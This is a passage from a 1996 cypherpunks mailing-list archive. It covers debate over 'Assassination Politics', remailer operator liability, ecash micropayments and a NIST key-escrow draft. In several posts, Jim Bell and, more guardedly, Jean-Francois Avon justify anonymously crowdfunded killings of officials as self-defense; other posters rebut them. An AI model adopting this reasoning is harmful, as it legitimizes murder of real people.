govt, no statist will be able to retaliate.  They might possibly make 
a few examples, but nobody will get fooled.  Anyways, since the 
system is completely delocalized, there is no target to aim at.  And 
furthermore, I think JB is right in saying that the middle-management 
level is much more likely to be hit first.  But thoses affluent 
statists are not middle-management. You have to figure out who will 
be targeted, and what are their means of reprisal.


> and the legitimate self defense
> options which are peaceful have not been adequately explored. IMO

Well, pardon my lack of imagination but I never found out too many 
effective ones.  I'll be delighted to consider any alternative you 
propose.  Encryption and anonymity tools *are* widely discussed and 
could make AP obsolete (hopefully).

> >> Bottom line for me: "Two wrongs don't make a right." 
> >
> >Please state the basic premise that make you declare what is
> >"wrong" in the context of AP.

> "Thou shalt not kill..." [pretty basic stuff here...]

I am sorry, but I do not accept that as a valid argument.  What if 
somebody came to take away your means of feeding your kids?
What if somebody was menacing you or your kids?
There are instances, as you seem to agree, when killing is justified. 
What is meant by the sentence is: Thou shalt not initiate lethal 
violence.  

> >but actually *obligated* to use physical violence in
> >certain contexts?  I guess not.
> 
> No, just not as first resort.
> 
> >  But many peoples think they have
> >to...
> 
> If they break my door down and want my gun or PGPkey, I shoot.
> No matter who, Jim Bell or Bill Clinton, they may die if they
> go far enough. I will not seek to kill anyone from afar, though, and
> I'd have to feel in fear of my life.

This is the dilemna that peoples in pre-war germany faced.  I met a
wonderfull old german gentleman who worked on the german radar
during the war.  I asked him about how Hitler was perceived by the
general thinking population.  He said that 60% of the population
tought very little of him, and did not agree with war.  Theses were
the educated germans.  But at the same time, since Hitler rallied
the other 40% of the population, the thugs at heart, they lived in
constant fear.  Nobody dared to say anything because nobody came
back from some interrogations...

And I was told the exact same thing by a previous girlfriend of mine, 
doing her PhD in chemistry.  She was iranian.  She had an irakian 
boyfriend for a while.  They were madly in love.  but what a fuss it 
made...  Anyhow, she told me that while in high school, seven of her 
schoolmate, sixteen years old girls, were taken from the classes by 
Khomeiny's political police.  Nobody, friends nor family, heard of them 
ever again.

AP simply turn the ethics of assasins toward other like minded.

Unfortunately, it can turn said mind toward valuable peoples too.  
And this is good reason to object.

> >I think that you simply try to evade the necessity of defining for
> >yourself what exactly is what the govt is doing.

> Taxation is theft, I fail to see your point. Well, depends.  

If you agreed to be taxed, then, maybe not.  But suppose it is: what
are the essentials of theft and what are the justified actions
againts it?  Now, does a kid stealing apples the same as the state
stealing individual's earned wealth ?  Does the same measure apply? 
Is the offense comparable?  (You must first define the exact context
of each)

> Murder isn't the sole, or even first, option to prevent theft when
> you can do things like lock doors. [encrypt]

In the case of govt, it have the legal monopoly on the use of
violence.  And it does not seem to hate using it.  But if you shoot
some govt official who decided that he wanted you PGP key or your
gun, you'll pay for it dearly even if you win in court.  The most
precious thing in life is time.  And the way we found, as rationnal
animals, to exchange time is to condense time into money.  Money is
an abstraction for productive time of our life.  The govt is working
very hard, at the victims expense, to make anything that can act as
a lock illegal.  And they enforce that with guns. So, do not surprize
yourself if many people find AP fully justified or is the only way 
left to them.

I do not advocate AP, notwithstanding what some others pretend (LD?). I
think that inducing the death of govt as we know it by financial
starvation through encrypted transactions is the way.  But I also
think that AP is impossible to prevent from happening because so
much peoples agree with the preceding paragraph.

> >> Even then, I prefer the judicial process to the oligarchy
> >> this scheme would entail
> >
> >This scheme is *not* an oligarchy.  Pay a visit to any good
> >dictionary near you.  Words have precise meaning and it is *much*
> >better to stick to it...
> 
> I said entail, *you* read a dictionary. The scheme relies on $, and
> more $ gives you more votes on who to kill. Oligarchy, a rule by the
> rich. I stuck exactly to it. Read more carefully.

Sorry, I don't have an english-french dictionnary.  But I think it 
means "might lead to" or "might imply".

Grand Larousse en 5 Volumes, Vol 4, p. 2229 : (I translate from
french)

Oligarchy: noun, feminine. (gr: oligarkhia) 1) political system in
which power is held by a small number of individuals who constitutes
either the intellectual elite (aristocracy) or the owning minority
(plutocracy ?), theses two aspect often coinciding.  2) when a
minority accaparates a power or an authority.

I have to do some more thinking on that.  I concede that I used the
wrong words.  To me, even if AP would fit the operationnal definition
of oligarchy, it is not.  Maybe because the definition had as a basic
premise that it is impossible to structure power without
communication. I think that anonymity technologies might force a
re-definition of the word in more precise terms.  In AP, it is
completely different in the sense that nobody agrees to the ideas of
other peoples.  They simply pass *their own* judgment using *their
own* reason and make *their own* decision to put a few bucks on this
or that head.  In oligarchy, the "intellectual elite" share some
common premises, ideas.  In AP, although you can derive a probability
distribution of the values held by the anonymous donators, they do
not actively share ideas.  And neither do the assassins.  There is no
collusion, no exchange of information, no peer pressure, no
conspiracy, no nothing.

The only factor is the wealth a given donator is willing to donate.  And
this makes it a "buckarchy", i.e. the ideas and values of peoples
who made it to wealth are statistically more likely to be
implemented.  But again, it is only a statistical, macroscopical
truth.  Only, theses peoples achieved wealth by sticking to a
certain type of values (considering that it takes years to
build a reputation and seconds to destroy it); they must have a stong
tendency toward a set of values that are pro-freedom, pro-economy,
and pro-productivity.  Laissez-faire, the french expression, means
"let do".

> >> and I think I'd be an easy target for wealthy statists,
> >>who could also use the system.

But OTOH, if you remain silent, you'll attract no one.

> >At first look, of course.  But operationnally, you have to consider
> >the mind of the statist to figure out the likeliness of their using
> >the system? I do not deny that it is very likely that a few
> >statists will use the system.  But most won't because they don't
> >like to slain their milk cows.
> 
> That's not how I view statists. your faith is admirable, but
> I won't share it soon.

Faith: zero, zip, none...

> hitler, Stalin, Clinton, they all
> would see me as hamburger just as soon as milkcow IMO. I
> have seen how history describes the minds of statists who
> don't get their way, it's not pretty.

(Did you read the complete AP essay?)

Yes.  But you also have to recognize that *never* in the history of 
mankind a media like the net ever existed.  The net is, IMO, a 
turning point in the history of humanity, just as the discovery of 
toolmaking was.  I think it will change the human history even more 
than the invention of the printing press.

> Many statists have
> the $ to kill me without AP, this would make me cheap and
> compromise the privacy of the remailernet probably, or just
> cause them to be outlawed.

A few questions here: Why any statists would want to target *you*?
There are plenty of guys like you who hates the guts of govt, have
big mouths,  and they don't get offed.  By being a C'punk, it is even
more dangerous for them: if they try to make an example by killing
you, the others CPunks will go underground, set up AP remailers and
get rid of them.  At least, they recognize that the last thing to do
in such circumstances, is to make martyrs.  Compare the number of
active posters to the number of readers, and you'll see that a lot of
C'punks stay in the shadow, without making any waves.  Now, to deal
with that volume of e-mail, one must have *some* sort of interest. 
Unless the silent majority *all* work for NSA... 

Ciao

JFA
PLEASE NOTE: THIS POST DOES NOT MEAN THAT I ENDORSE MR. BELL'S
SYSTEM.  MY RATIONNAL CONCLUSIONS ABOUT IT'S INTERNAL MECHANICS
AND IT'S INTRINSIC LOGICS DOES NOT MEAN THAT I LIKE NOR ENDORSE
THE SYSTEM. I SIMPLY CONCLUDED THAT IT IS IMPOSSIBLE TO PREVENT
THE SYSTEM FROM BEING IMPLEMENTED.  IMO, IT IS UNAVOIDABLE.

 DePompadour, Societe d'Importation Ltee  
 Limoges porcelain, Silverware and mouth blown crystal glasses

 JFA Technologies, R&D consultants.
 Physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@obscura.com>
Date: Wed, 22 May 1996 08:29:47 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: The Crisis with Remailers
In-Reply-To: <adc757e122021004025a@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.960521115520.8484A-100000@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 May 1996, Timothy C. May wrote:

> At 6:16 PM 5/21/96, Lance Cottrell wrote:
> 
> >I had thought of that. Unfortunately, if the coin is of a special form
> >which identifies the message as being a cover message, then they are of no
> >use against the attacker who is running a remailer. The cover messages
> >really have to be indistinguishable from real messages, even to the
> >remailers. One could do some kind of accounting, where every remailer would
> >refund to the traffic generators their share of the postage, but there is a
> >lot of trust required for that system since it is impossible (very
> >difficult) to verify.
> 
> First, it's not clear to me that "The cover messages really have to be
> indistinguishable from real messages, even to the remailers."
> 
> The "slug messages" will be indistinguishable to all outside observers.

I think the "enemy controled remailer" is an important part of the threat 
model. In many ways it is easier to do than to monitor all the traffic.

> Only by colluding with other remailers will Alice be able to tell Bob,
> Charles, etc. which were slugs and which were not.

True, but it is folly to think that only one remailer would be compromised.

> Second, I was thinking of the model in which all remailer usage is by
> tokens or slugs, anyway, in which case Alice would not know if an incoming
> message was by a "paying customer" or by one of the other remailers.

There has been a lot of discussion of this. It is difficult to make slugs 
which can be purchased in bulk (since you want to buy them using 
anonymous mail), can not be used to connect messages from a one person, 
and do not infringe on Chaum's patents. It is not acceptable for a 
remailer to see a message and know which other messages came from that 
same person. If it is ever the first remailer, it knows who you are. If 
it is the last, it knows who you mailed to. There has been discussion of 
secondary markets for the slugs, but I don't think it is going to happen.
 
> This discussion belongs on the list, not in private e-mail.

Oops, I must have hit the wrong key. I ment to have a copy go to the list.
 
> --Tim

	-Lance

-------------------------------------
Lance Cottrell   loki@infonex.com
President Infonex Internet Services
http://www.Infonex.com
-------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@MICROSOFT.com>
Date: Wed, 22 May 1996 13:37:40 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Interactive Week exclusive - White House to launch "Clipper III"
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960521192106Z-12581@abash1.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	Declan B. McCullagh

>... Self escrow will be permitted under specific circumstances. The
>escrow 
>agent must meet performance requirements for law enforcement access."
..................................................................

(So I guess it wouldn't be kosher to use the Mafia....)


    ..
Blanc

>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 22 May 1996 07:03:30 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous info
In-Reply-To: <9605210131.AA28441@anon.penet.fi>
Message-ID: <9605211725.AA00712@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


admin@anon.penet.fi writes:
> You have requested information about your account at anon.penet.fi.

> Your code name is: <an611909@anon.penet.fi>
> Your real e-mail address is: <cypherpunks@toad.com>

I guess the latest fun thing for |<-rad d00ds to do is to post flame-bait to  
Usenet with a forged penet address that points to a mailing list...


andrew
(Does the Family Research Council have a mailing list, and does it forward  
messages from non-subscribers? :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 22 May 1996 06:14:07 +0800
To: loki@infonex.com (Lance Cottrell)
Subject: Re: The Crisis with Remailers
In-Reply-To: <adc6fd44040210044e8a@[206.170.115.3]>
Message-ID: <199605211737.MAA11905@homeport.org>
MIME-Version: 1.0
Content-Type: text


Lance Cottrell wrote:
| 
| An interesting problem with anonymous postage is that it is likely to kill
| cover traffic generators.
| 

Postage is most needed at the point of delivery.

That is the node that will be taking the heat/paying the lawyers.  I'd
operate a remailer if I was never the last node, becuase I don't have
a site that can take the heat/seizure of machines for me.  If we pay
those final nodes to do more, than intermediate nodes can still carry
cover traffic for free.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 22 May 1996 13:38:06 +0800
To: Steven L Baur <steve@miranova.com>
Subject: Re: The Crisis with Remailers
In-Reply-To: <m2g28uhgh3.fsf@deanna.miranova.com>
Message-ID: <199605211948.MAA11490@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>It isn't spam if they're paying for the traffic.  Commercial
>advertisement through electronic mail is only evil because it is
>forced on someone against their wishes and on their dime.  The current
>situation is much like a telemarketer calling long distance collect
>with billing done automatically, and you can't hang up until they're
>done with their spiel.
>
>If it were standard practice for email recipients to charge the sender
>an ecash fee (waived if they thought the mail worth their time), it
>would make things much more interesting.

a very interesting proposal (I believe Bill Gates may have even
suggested this in his book), but keep in mind you seem to be mixing
different ideas here.

there is a cost involved in delivering a message associated with
pure communications costs. then there may be a cost imposed on someone
to obtain the attention. the latter is arbitrary. the former is
pretty well established based on internet infrastructure.

what you might keep in mind is the following: in a public forum,
where "spam" was originally invented, who decides how much it
costs to post? now lets say we could quantify the communications
costs. ok fine, this comes out to $.05/msg (a large example number).
that is still economically viable for someone to "spam". to
a mail marketer this would be a really great deal. hence a system
that only charges communications fees is unlikely to prevent
spam, imho. furthermore, in a public forum, you aren't very
easily going to be able to implement "arbitrary" charges like
I wrote about.

so charging for email to one's mailbox is one possible way to
deal with spam, but it's hard to see how one could apply this
to public forums. and in many ways, the spam problem is most
difficult to solve there.

but I like the thinking on methods of trying to solve the spam
problem. I do believe it is solvable. it's just that its such
an insanely difficult problem to solve. it's a good example
of a problem that gets worse when the span of the software
grows larger.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 22 May 1996 10:01:29 +0800
To: liberty@gate.net (Jim Ray)
Subject: Re: AP
Message-ID: <199605211950.MAA11596@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:28 PM 5/20/96 +0000, Jean-Francois Avon wrote:  [quoting Jim Ray>>]

>Interesting.  Has AP ever popped-up in the conventional medias?

Other than the article I quote in its entirety in Part 8 of AP, an article 
from the Asahi Evening News (an english-language daily newspaper in Japan), no.


>Then, again, I know an awfull lot of people who would applaude Bell.  
>But most of them are not computer litterate.  They are from another 
>generation, not brainwashed by "Don't ask what your country can 
>do for you; ask what you can do for your country"...

Unfortunately, it generally takes knowledge of at least computer networking, 
with a little knowledge of encryption and a vaguely passing familiarity with 
digital cash, to understand AP with enough detail to be useful.  But I'm 
constantly amazed at how many people really APPRECIATE the idea, and its 
ramifications.


>> This kind of thinking might authorize a massive Cherokee
>> massacre if it spread, IMO.
>
>Please, do point out the similarities and the differences... I think 
>that the context is very different.

If anything, I think AP would have allowed Indians to defend themselves, had 
they had access to it.

>> We must, as
>> Libertarians, face the fact that taxation we object to is not seen
>> by many people as coercive.

I don't think this is necessary:  They need not see that something is wrong 
to be deterred by the possibility of their agents getting killed doing 
something that they see as "non-coercive."



>> Even then, I prefer the judicial process to the oligarchy
>> this scheme would entail
>
>This scheme is *not* an oligarchy.  Pay a visit to any good dictionary 
>near you.  Words have precise meaning and it is *much* better to 
>stick to it...
>
>Actually, since it is ruled by money, it might be a "buckarchy", but 
>again, everybody can spare a few bucks, so it might be a democracy 
>too if you insist on twisting the meaning of words.

Yes, I think it would be a good idea to name the resulting society...


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 22 May 1996 13:36:58 +0800
To: "Vladimir Z. Nuri" <jf_avon@citenet.net
Subject: Re: (Fwd) Re: TCM: mafia as a paradigm for cyberspace
Message-ID: <199605211950.MAA11604@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:34 PM 5/20/96 -0700, Vladimir Z. Nuri wrote:

>>Second, everybody like Jim Bell who is pushing the AP scheme is doing
>>so on ethical basis: that the coercion the government imposes on to
>>the individuals by regulations, and guns backed taxation justifies the
>>killings.  I have to see yet any cypherpunks who seems to agree with
>>AP that envision another use than govt control.
>
>right, and Hitler didn't have any other use for his government other
>than to bring utopia to the masses, and used all the ovens for cooking
>pizzas (after all, what else could an oven be used for?!?!?).
>
>the above sentence I find absolutely abhorrent: it justifies killing,
>not merely because of the effect (the sort of "ends-justifies-the-means"
>argument used by most here), but that in addition it is 
>supposedly "ethical". ethical?!?!? 

Then you've obviously dramatically mis-read my ideas.  I don't claim that 
_EVERYBODY_ who will fall victim will "deserve" it by your or my opinions, 
or by generally-agreed-upon philosophy like the libertarian's 
"Non-Initiation of Force Principle" (NIOFP).   Rather, I claim that the 
justification for any given killing must (and will, or won't, depending) 
come from some external fact having nothing to do with AP.  

For example, if you believe in NIOFP, then anyone who violates it has 
initiated force, and the victim of such force (or, perhaps, anyone else?) 
can legitimately use a system like AP to fight back.  If you _don't_ believe 
in libertarian philsophy, obviously you won't necessarily agree with AP, but 
the source of your agreement is that, not something inherently wrong with AP.


>the assassination politics is quite Hitleresque at its root.
>"kill our enemies, and everything will be better. it is our enemies
>that are the root of all evil in the world. extinguish them, and
>you solve all problems automatically"

THat's a false claim.  If the "enemies" are enemies because of what they've 
actually done wrong, say violate your rights, then it should be your right to stop 
them.  The method you choose shouldn't matter.

>there is a trite saying, "two wrongs do not make a right" (trite
>because most have mastered the simple truth of it in their pre-teen
>years). a concept not grasped by some second-graders. some 
>require a lifetime of lessons to comprehend it in the end..

You seem to be assuming that if there are TWO "wrongs" here.  But I've tried 
to make it abundantly clear that justification for the self-defense comes 
from the initial "wrong."  Where, then, is the SECOND "wrong"?  What, 
exactly, makes it wrong?  If a person can't get justice any other way (not 
to be confused with merely a chance at justice) then why deny that person 
his rights?

I acknowledge that if there is no initial "wrong" (the target didn't 
actually do anything wrong) then the act of targeting him is, itself, wrong, 
but you're apparently unwilling to back up this hypothetical. 


>I'm very disappointed that others have not chased Assassination
>Politics proponents to take their trash somewhere else. of course
>the real situation is that those that started this list have
>sympathies for this kind of thinking, so no such thing will happen.

It should be obvious to anyone around here that if AP "works," it will work 
regardless of whether it meets with your approval or any other subset of 
humankind.  That makes it worthy of discussion even if you don't like it.


>to Jim Bell and Avon: please read Machiavelli. read about ancient
>assassination clubs and the history of bloody politics. if you want
>to seriously further your ideas, start a web site with ample 
>historical research. your ideas are not new whatsoever. 

Your objections are invalid.  The mere fact that SOME organized killing 
systems occurred in the past has essentially no relationship to the system I 
describe.  The prospect of perfect anonymity, allowing the system to be open 
to anyone who chooses to contribute, will make it vastly different from 
anything that came before.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 22 May 1996 13:37:32 +0800
To: liberty@gate.net (Jim Ray)
Subject: Re: AP
Message-ID: <199605211950.MAA11610@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:21 PM 5/20/96 +0000, Jean-Francois Avon wrote:
>On 20 May 96 at 10:28, Jim Ray wrote:

>> >And you'll also note that the anonymity issue generate more
>> >interest from more CPunks because it (hopefully) will acheive the
>> >same goal without any killing.
>> 
>
>> our
>> anonymity-baby threatens to have govt. kill it in the crib,
>
>It is not yours, it only *is*.
>
>> with the support of the people. 
>
>Here, again, Jim Bell would probably say that this sentence proves 
>him right...

Absolutely!  Even these days, what passes for "the support of the people" is 
simply the generally-agreed-upon position of the news media, which the 
public is supposed to accept as their opinion.  Before alternative sources 
of information such as the Internet appeared, TV stations and print media 
could just about mold public opinion any way they wanted, within limits.

>> I have not respected a US president in my lifetime, yet I get _pissed_ 
when they get
>> shot/shot at.
>
>I somehow agree with you here.

I could say, "I don't want to see any president get shot," but that's simply 
because I want them to resign instead.  And it really isn't the president, 
per se, who is the problem:  It's the entire political system which chooses 
the candidates, from which the public is only given a one-of-two choice in 
the matter.  If the system were cleaned up, and massively reduced in power, 
we could have a figurehead president that nobody would even dream of 
harming, because he exercises no abusive power.

And in any case, since I think it is legitimate for "us" (everyone else in 
the world) to pay for the death of (say) Saddam Hussein or Moammar Khadafi, 
it would be selfish of me to suppose that any system which could easily 
achieve that could somehow be tuned to ensure that "our" presidents are 
somehow immune.  I would much rather see _all_ the leadership under the risk 
of the gun than none of it.


>> Killing seems to be a first resort for some,
>> and IMO ends do not justify means.
>
>Well, here, you are threading on a very difficult path.  Of course, 
>the ends does never justifies the means in an *uncoerced* context.  
>But what JB says, is that AP would be a justified "self defense" 
>against coercion. 

That's right.  However, I've noticed that the people who object to AP rarely 
want to talk about the self-defense aspect of the situation; they want to 
assume that nobody has done anything wrong enough to justify AP from being 
used against them.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com
Date: Wed, 22 May 1996 07:05:26 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
Message-ID: <2.2.32.19960521165841.00689290@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:40 AM 5/20/96 -0700, you wrote:

>	one cent could well be too low.

I have been a client of the c2.org pre/re mailer on several occasions.   

What with all the discussion of remailers falling away (or being pushed), I am
concerned that the 10 cent fee I, and hopefully others, have been paying in
e-cash is not sufficient to keep c2.og's remailer in operation. I would be
willing to pay, say for discussions sake, the postal rate for the convenience
and security it offers.
Alec                   Every suceeding scientific discovery
                       makes greater nonsense
camcc@abraxis.com      of old-time conceptions of sovereignty.  A. Eden

PGP Fingerprint:

Key ring: 'c:\pgp\pubring.pgp', looking for user ID "0x41207EE5".
Type bits/keyID    Date       User ID
pub  1024/41207EE5 1996/04/08 Alec McCrackin <camcc@abraxis.com>
          Key fingerprint =  09 13 E1 CB B3 0C 88 D9  D7 D4 10 F0 06 7D DF 31 
                              Alec McCrackin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@netcom.com (Pat Farrell)
Date: Wed, 22 May 1996 10:02:57 +0800
To: pfarrell@netcom.com
Subject: Enabling Privacy, Commerce, Security and Public Safety
Message-ID: <199605212018.NAA07009@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


in the Global Information Infrastructure

Thanks to Ed Roback, John Young, and "DN", the NIST draft report is
now available.

URL: http://www.isse.gmu.edu/~pfarrell/nist/kmi.html

I will work on making it prettier this evening, but I figured that people
want to get it as soon as possible. Also, as of a couple of hours ago, the 
paper copy of this was _not_ available at the OMB publications
office (the address in Ms. Frye's posting.) I recommend not trying to call
them, as after you spend time working through their flooded inbasket, you
still won't get it.

So, if you want hard copy, print my file :-)

Pat

Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@pi.se>
Date: Wed, 22 May 1996 01:07:07 +0800
To: bryce@digicash.com
Subject: Re: The Crisis with Remailers
Message-ID: <2.2.32.19960521121126.00371160@mail.pi.se>
MIME-Version: 1.0
Content-Type: text/plain


At 10:08 1996-05-21 +0200, bryce@digicash.com wrote:
>The "minimum ecash payment" is not known at this time,
>although we think it might be greater than 2^-32 US Dollars

How do you create such tiny payments? When I try (2.1.5a MT)
to pay $.001 I receive the warning "Too many digits after '.'!" and
even though it's just a warning I can't do the payment.

Assuming that you had a client that allows tiny amounts, how would
you represent a tenth of a cent in binary? To to it exactly would
require an infinite number of coins...

Matts





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marcel van der Peijl" <bigmac@digicash.com>
Date: Wed, 22 May 1996 01:12:24 +0800
To: Matts Kallioniemi <matts@pi.se>
Subject: Re: The Crisis with Remailers
Message-ID: <199605211223.OAA23368@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


> How do you create such tiny payments? When I try (2.1.5a MT)
> to pay $.001 I receive the warning "Too many digits after '.'!" and
> even though it's just a warning I can't do the payment.
> Assuming that you had a client that allows tiny amounts, how would
> you represent a tenth of a cent in binary? To to it exactly would
> require an infinite number of coins...

The minimum denomination for each currency is (sort of)
configurable. For instance, for Belgian Franks the minimum is 1 (and
no '.'). If a bank requested a currency capable of handling a
mimimum of 0.00005 we could make that happen real easy. Note that
with the maximum coin size 2^15 times minimum amount, the maximum
coin would get a lot smaller, so that it would become more
impractical to pay large amounts in that currency.

On the longer term we can of course even change
- the 2^15 maximum
- maximum number of coins per message (currently 75)
if the requirements were there.


// Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
// ----------------- insert subliminal message here ------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 22 May 1996 03:32:34 +0800
To: cypherpunks@toad.com
Subject: NIST Draft Key Escrow Paper
Message-ID: <199605211425.OAA22632@pipe5.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   [Forward] 
 
   From: Elaine Frye <elaine.frye@nist.gov> 
   Subject: draft key escrow paper 
 
   May 20, 1996 
 
   Note 
 
   To:  Key Escrow Distribution List 
 
   From:  Ed Roback, NIST 
 
   Subject:  Release of DRAFT Key Escrow Paper 
 
   FYI, today the Interagency Working Group (IWG) on 
   Cryptography Policy released a DRAFT paper entitled 
   "Enabling Privacy, Commerce, Security and Public Safety in 
   the Global Information Infrastructure." 
 
   The DRAFT paper discusses a voluntary draft key management 
   infrastructure, supported by private sector key management 
   organizations, that would permit users and manufacturers 
   free choice of encryption algorithms, facilitate 
   international interoperability, preserve law enforcement 
   access, and, most importantly, provide strong system 
   security and integrity.  FYI, the paper was released by the 
   IWG co-chairs Ed Appel (NSC) and Bruce McConnell (OMB). 
 
   Comments on the draft paper are being solicited.  No 
   deadline is specified.   
 
   At present, I do not have an electronic copy of the draft 
   (25 pp).  Copies are available through the OMB publications 
   office at 202-395-7332.  I anticipate that the document 
   will soon be available widely on the net and will forward 
   you a web address when available. 
 
 
   ***************************************************** 
   Elaine Frye 
   Computer Security Division 
   National Institute of Standards and Technology 
   Bldg. 820, M.S. Room 426 
   Gaithersburg, MD  20899-0001 
   Voice:   301/975-2819    Fax:  301/948-1233 
   ***************************************************** 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 22 May 1996 13:12:02 +0800
To: Jim Choate <cypherpunks@toad.com
Subject: Re: Remailer extensions
Message-ID: <199605212152.OAA26404@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:17 AM 5/21/96 -0500, Jim Choate wrote:
>In pondering the last few days of discussion it occurs to me that a test
>might be possible. In short:
>
>Is it legal for a business to anonymously remail physical mail?
>
>The process I propose is as follows:
>
>1.   Some party mails an envelope to 'Remailers-R-Us'.
>
>2.   Inside that envelope is the real mail addressed and stamped along
>     with say a $1 money order for processing.
>
>3.   The people at Remailers-R-Us simply take the dollar and deposit it
>     in the bank while depositing the letter they received in the local
>     mail drop.

I can't say whether this is "legal" (it probably is) but I believe that this 
was a fairly common practice in the 1960's in the US, when people were 
dodging the draft, running away from home to join a commune, etc.  Such 
services were advertised in various magazines, and operated on the 
principles you described.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <alex@proust.suba.com>
Date: Wed, 22 May 1996 10:23:40 +0800
To: cypherpunks@toad.com
Subject: mixmaster nsa@omaha.com going down Jun 4th.
Message-ID: <199605211959.OAA05920@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


I'm closing my mixmaster, nsa@omaha.com, on the 4th of June.

There wasn't an incident that triggered this, but Hal's post about the FBI
sort of spooked me, as have the lawsuits.  I don't have a lot of assets
myself, but I do have partners.  My lawyer tells me that there's no
reliable way to separate my personal net activities from those of the
company my parnters and I own, and that I could even be exposing my 
parnters to personal liability.

I can't speak for anyone else, but for me the problem with running a
remailer is that it's an inherently altruistic enterprise.  That in itself
wouldn't be so bad, but the liability makes the extent of the altruism
open ended.  If I knew that the worst case scenario would be $1k or even a
$5k personal loss I could do it, but an open ended liability that's shared
by my partners is unacceptable. 

I'm sorry for the inconvenience this will cause.

--
Alex Strasheim, alex@proust.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Wed, 22 May 1996 03:24:31 +0800
To: Matts Kallioniemi <matts@pi.se>
Subject: Re: The Crisis with Remailers
In-Reply-To: <2.2.32.19960521121126.00371160@mail.pi.se>
Message-ID: <199605211334.PAA25526@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 Matts Kallionieme <matts@pi.se> wrote:
>
> At 10:08 1996-05-21 +0200, bryce@digicash.com wrote:
> >The "minimum ecash payment" is not known at this time,
> >although we think it might be greater than 2^-32 US Dollars
> 
> How do you create such tiny payments? When I try (2.1.5a MT)
> to pay $.001 I receive the warning "Too many digits after '.'!" and
> even though it's just a warning I can't do the payment.


The Ecash(tm) coins minted by the Mark Twain Bank have a base
value of 0.01 U.S. Dollar.  So in using those coins, you can't
spend less than 0.01 U.S. Dollar unless you adopt some protocol
like only pay every tenth time, or only pay on a 1-in-10 random
chance every time, or something.


But _Ecash(tm)_ itself does not have that restriction.
Different coinages of Ecash(tm), issued by different banks, may
have different base values.


> Assuming that you had a client that allows tiny amounts, how would
> you represent a tenth of a cent in binary? To to it exactly would
> require an infinite number of coins...


Well how do we represent 0.01 U.S. Dollars in Mark Twain 
Ecash(tm)?  Easy-- we take a few bits of data, interpret it as 
an unsigned binary number, and then say "this number is how many
U.S. pennies this coin is worth."


Actually it can sometimes get more complicated than that, and 
there are some details about how the forthcoming ecashlib 
handles this to be found at "http://www.digicash.com/api".


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMaHGZ0jbHy8sKZitAQE9qAMAuE5d4Ratp3l/6nGHkUQCDbT4z/kLPFCc
FFnNVV1N7v3Dyk1MBxm1gr+i3U5uzjbbopnZzhHKgujKIbvjRTXp89CMT30jAKR4
70WIIsJ/PWQ6b+1U2Hve6UDb98lfohvh
=QVQU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
